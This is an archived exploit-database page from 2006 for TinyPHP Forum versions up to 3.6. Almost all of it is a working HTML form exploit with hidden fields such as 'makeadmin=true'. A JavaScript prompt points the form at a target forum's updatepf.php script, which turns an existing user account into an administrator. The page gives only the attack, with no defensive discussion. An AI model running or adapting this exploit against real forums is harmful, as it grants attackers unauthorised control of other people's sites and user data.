TinyPHP Forum <= 3.6 (makeadmin) Remote Admin Maker Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TinyPHP Forum <= 3.6 (makeadmin) Remote Admin Maker Exploit
# Published : 2006-08-02
# Author : SirDarckCat
# Previous Title : SaveWeb Portal <= 3.4 (SITE_Path) Remote File Inclusion Vulnerabilities
# Next Title : Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability

TinyPHPForum 3.6 Admin Maker<br>
By SirDarckCat from elhacker.net

<FORM method=post enctype="multipart/form-data">
Existing User:<INPUT name=uname><br>
<INPUT type=file name=userfile style="visibility:HIDDEN"><br>
<INPUT type=hidden name=email value="a@b.c">
<input type=hidden name=makeadmin value=true>
<input type=hidden name=stat value=true>
<input type=hidden name=ulang value=en>
<input type=hidden name=uskin value=default>
<INPUT type=submit>
</FORM>

<script language="JavaScript">
document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php";
</script>

# www.Syue.com [2006-08-02]